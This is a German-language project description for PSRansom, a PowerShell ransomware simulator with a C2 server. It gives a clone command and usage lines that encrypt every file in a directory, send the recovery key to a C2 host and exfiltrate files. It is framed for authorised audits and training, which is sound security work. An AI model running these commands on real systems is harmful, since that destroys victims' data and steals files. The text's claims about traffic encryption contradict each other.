
PowerShell-Ransomware-Simulator mit C2-Server

PSRansom ist ein PowerShell-Ransomware-Simulator mit C2-Server-Funktionen. Dieses Tool hilft Ihnen, den Verschlüsselungsprozess einer generischen Ransomware auf jedem System mit installierter PowerShell zu simulieren. Dank des integrierten C2-Servers können Sie Dateien exfiltrieren und Client-Informationen per HTTP empfangen.
Die gesamte Kommunikation zwischen den beiden Elementen wird verschlüsselt oder kodiert, um von Verkehrsinspektionsmechanismen nicht erkannt zu werden, obwohl zu keinem Zeitpunkt HTTPS verwendet wird.
Es wird empfohlen, das vollständige Repository zu klonen oder die ZIP-Datei herunterzuladen. Dies kann mit folgendem Befehl durchgeführt werden:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: Dieses Tool hilft Ihnen, den Verschlüsselungsprozess einer
generischen Ransomware in PowerShell mit C2-Fähigkeiten zu simulieren
Verwendung: .\PSRansom.ps1 -e Verzeichnis -s C2Server -p C2Port
Verschlüsselt alle Dateien & sendet den Wiederherstellungsschlüssel an C2Server
Verwenden Sie -x, um Dateien auf dem C2Server zu exfiltrieren und zu entschlüsseln
.\PSRansom.ps1 -d Verzeichnis -k Wiederherstellungsschlüssel
Entschlüsselt alle Dateien mit dem Wiederherstellungsschlüssel-String
Warnung: Alle Informationen werden ohne Verschlüsselung an den C2Server gesendet
Sie benötigen einen zuvor generierten Wiederherstellungsschlüssel, um Dateien wiederherzustellen
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
Dieses Projekt ist unter der GNU 3.0-Lizenz lizenziert - siehe die LICENSE-Datei für weitere Details.
Dieses Tool wurde von Grund auf von Joel Gámez Molina // @JoelGMSec erstellt und entworfen.
Diese Software bietet keinerlei Garantie. Ihre Nutzung ist ausschließlich für Bildungsumgebungen und/oder Sicherheitsaudits mit entsprechender Einwilligung des Kunden bestimmt. Ich bin nicht verantwortlich für Missbrauch oder mögliche Schäden, die dadurch verursacht werden.
Weitere Informationen finden Sie auf Twitter als @JoelGMSec und auf meinem Blog darkbyte.net.
Sie können meine Arbeit unterstützen, indem Sie mir einen Kaffee kaufen: